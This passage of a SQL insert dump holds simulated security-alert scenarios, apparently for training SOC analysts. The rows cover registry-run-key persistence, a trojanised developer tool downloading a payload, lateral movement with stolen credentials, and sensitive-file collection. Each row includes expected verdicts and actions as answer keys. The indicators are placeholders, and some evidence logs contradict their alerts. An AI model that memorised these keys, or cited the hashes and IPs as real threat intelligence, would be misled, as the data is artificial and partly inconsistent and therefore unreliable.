Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(398, 'Vcrodat Malware Persistence Mechanism', 'high', 'System Logs', 'The Vcrodat malware has been observed manipulating registry keys for persistence. This is a known tactic of the Whitefly group to ensure continuous access to compromised systems. The malware modifies the registry key to execute a malicious payload upon system startup.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:21Z\",\"source_ip\":\"103.245.222.133\",\"destination_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"registry_value_name\":\"MaliciousApp\",\"registry_value_data\":\"C:\\\\Windows\\\\System32\\\\ncsvc.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"process_id\":4824,\"process_name\":\"ncsvc.exe\"}', '2026-01-04 02:15:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"103.245.222.133\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with Vcrodat malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ncsvc.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Malicious executable used for persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User\'s account may be compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.001Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:21Z\\\",\\\"source_ip\\\":\\\"103.245.222.133\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ncsvc.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"process_id\\\":4824,\\\"process_name\\\":\\\"ncsvc.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.001Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:21Z\\\",\\\"source_ip\\\":\\\"103.245.222.133\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ncsvc.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"process_id\\\":4824,\\\"process_name\\\":\\\"ncsvc.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.001Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:21Z\\\",\\\"source_ip\\\":\\\"103.245.222.133\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ncsvc.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"process_id\\\":4824,\\\"process_name\\\":\\\"ncsvc.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.001Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:21Z\\\",\\\"source_ip\\\":\\\"103.245.222.133\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ncsvc.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"process_id\\\":4824,\\\"process_name\\\":\\\"ncsvc.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.001Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:21Z\\\",\\\"source_ip\\\":\\\"103.245.222.133\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ncsvc.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"process_id\\\":4824,\\\"process_name\\\":\\\"ncsvc.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(399, 'Compromised Open-Source Tool Identified', 'high', 'Open-Source Intelligence (OSINT)', 'An open-source tool frequently used by developers has been modified to include malicious code. The tool is leveraging legitimate traffic patterns to avoid detection by security systems. The malicious code attempts to establish a connection with a known malicious IP and downloads additional payloads.', 'Defense Evasion', 'T1562.001 - Impair Defenses: Disable or Modify Tools', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:25:36Z\",\"event_id\":\"EVT-1004\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"tool_name\":\"OpenSourceDevTool\",\"malicious_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_path\":\"/usr/local/bin/OpenSourceDevTool\",\"action\":\"download\",\"payload_url\":\"http://malicious.example.com/payload\",\"status\":\"success\"}', '2026-01-04 02:15:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware signature\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/usr/local/bin/OpenSourceDevTool\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"suspicious\",\"details\":\"Modified version of a known open-source tool\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious.example.com/payload\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious payload\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.002Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:36Z\\\",\\\"event_id\\\":\\\"EVT-1004\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"tool_name\\\":\\\"OpenSourceDevTool\\\",\\\"malicious_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_path\\\":\\\"/usr/local/bin/OpenSourceDevTool\\\",\\\"action\\\":\\\"download\\\",\\\"payload_url\\\":\\\"http://malicious.example.com/payload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.002Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:36Z\\\",\\\"event_id\\\":\\\"EVT-1004\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"tool_name\\\":\\\"OpenSourceDevTool\\\",\\\"malicious_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_path\\\":\\\"/usr/local/bin/OpenSourceDevTool\\\",\\\"action\\\":\\\"download\\\",\\\"payload_url\\\":\\\"http://malicious.example.com/payload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.002Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:36Z\\\",\\\"event_id\\\":\\\"EVT-1004\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"tool_name\\\":\\\"OpenSourceDevTool\\\",\\\"malicious_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_path\\\":\\\"/usr/local/bin/OpenSourceDevTool\\\",\\\"action\\\":\\\"download\\\",\\\"payload_url\\\":\\\"http://malicious.example.com/payload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.002Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:36Z\\\",\\\"event_id\\\":\\\"EVT-1004\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"tool_name\\\":\\\"OpenSourceDevTool\\\",\\\"malicious_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_path\\\":\\\"/usr/local/bin/OpenSourceDevTool\\\",\\\"action\\\":\\\"download\\\",\\\"payload_url\\\":\\\"http://malicious.example.com/payload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.002Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:36Z\\\",\\\"event_id\\\":\\\"EVT-1004\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"tool_name\\\":\\\"OpenSourceDevTool\\\",\\\"malicious_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_path\\\":\\\"/usr/local/bin/OpenSourceDevTool\\\",\\\"action\\\":\\\"download\\\",\\\"payload_url\\\":\\\"http://malicious.example.com/payload\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(400, 'Unauthorized Credentials Accessed', 'high', 'Security Information and Event Management (SIEM)', 'Compromised credentials were used by the attacker to perform lateral movement within the network. The attacker, associated with the Whitefly group, utilized stolen credentials to access multiple systems, potentially exfiltrating sensitive data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_type\":\"authentication\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"jdoe_admin\",\"action\":\"login_success\",\"details\":{\"method\":\"RDP\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"whitefly_tool.exe\"},\"network\":{\"src_port\":3389,\"dest_port\":3389}}', '2026-01-04 02:15:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Whitefly APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within corporate network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Admin account used in unauthorized manner.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a tool used by Whitefly for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"whitefly_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"File used in conjunction with Whitefly\'s attack strategies.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.004Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"authentication\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"login_success\\\",\\\"details\\\":{\\\"method\\\":\\\"RDP\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"whitefly_tool.exe\\\"},\\\"network\\\":{\\\"src_port\\\":3389,\\\"dest_port\\\":3389}}\"},{\"timestamp\":\"2026-02-01T20:31:19.004Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"authentication\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"login_success\\\",\\\"details\\\":{\\\"method\\\":\\\"RDP\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"whitefly_tool.exe\\\"},\\\"network\\\":{\\\"src_port\\\":3389,\\\"dest_port\\\":3389}}\"},{\"timestamp\":\"2026-02-01T20:30:19.004Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"authentication\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"login_success\\\",\\\"details\\\":{\\\"method\\\":\\\"RDP\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"whitefly_tool.exe\\\"},\\\"network\\\":{\\\"src_port\\\":3389,\\\"dest_port\\\":3389}}\"},{\"timestamp\":\"2026-02-01T20:29:19.004Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"authentication\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"login_success\\\",\\\"details\\\":{\\\"method\\\":\\\"RDP\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"whitefly_tool.exe\\\"},\\\"network\\\":{\\\"src_port\\\":3389,\\\"dest_port\\\":3389}}\"},{\"timestamp\":\"2026-02-01T20:28:19.004Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"authentication\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"login_success\\\",\\\"details\\\":{\\\"method\\\":\\\"RDP\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"whitefly_tool.exe\\\"},\\\"network\\\":{\\\"src_port\\\":3389,\\\"dest_port\\\":3389}}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(401, 'Unusual Data Access Patterns Detected', 'high', 'Data Loss Prevention (DLP)', 'Sensitive patient data and proprietary information from materials science research were accessed in a manner indicative of preparation for data exfiltration. The activity was detected originating from an internal network, accessing multiple sensitive files in quick succession, and communicating to an external IP address known for malicious activities.', 'Collection', 'T1119', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"dlp-collection-56789\",\"source_ip\":\"10.1.1.5\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"accessed_files\":[\"/research/patient_data/sensitive_data.xlsx\",\"/research/materials_science/proprietary_formula.docx\"],\"file_hashes\":[\"d41d8cd98f00b204e9800998ecf8427e\",\"5eb63bbbe01eeed093cb22bb8f5acdc3\"],\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"alert_reason\":\"Multiple sensitive files accessed and malware hash detected.\"}', '2026-01-04 02:15:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"Employee of the company.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.005Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-collection-56789\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"accessed_files\\\":[\\\"/research/patient_data/sensitive_data.xlsx\\\",\\\"/research/materials_science/proprietary_formula.docx\\\"],\\\"file_hashes\\\":[\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"5eb63bbbe01eeed093cb22bb8f5acdc3\\\"],\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_reason\\\":\\\"Multiple sensitive files accessed and malware hash detected.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.005Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-collection-56789\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"accessed_files\\\":[\\\"/research/patient_data/sensitive_data.xlsx\\\",\\\"/research/materials_science/proprietary_formula.docx\\\"],\\\"file_hashes\\\":[\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"5eb63bbbe01eeed093cb22bb8f5acdc3\\\"],\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_reason\\\":\\\"Multiple sensitive files accessed and malware hash detected.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.005Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-collection-56789\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"accessed_files\\\":[\\\"/research/patient_data/sensitive_data.xlsx\\\",\\\"/research/materials_science/proprietary_formula.docx\\\"],\\\"file_hashes\\\":[\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"5eb63bbbe01eeed093cb22bb8f5acdc3\\\"],\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_reason\\\":\\\"Multiple sensitive files accessed and malware hash detected.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.005Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-collection-56789\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"accessed_files\\\":[\\\"/research/patient_data/sensitive_data.xlsx\\\",\\\"/research/materials_science/proprietary_formula.docx\\\"],\\\"file_hashes\\\":[\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"5eb63bbbe01eeed093cb22bb8f5acdc3\\\"],\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_reason\\\":\\\"Multiple sensitive files accessed and malware hash detected.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.005Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 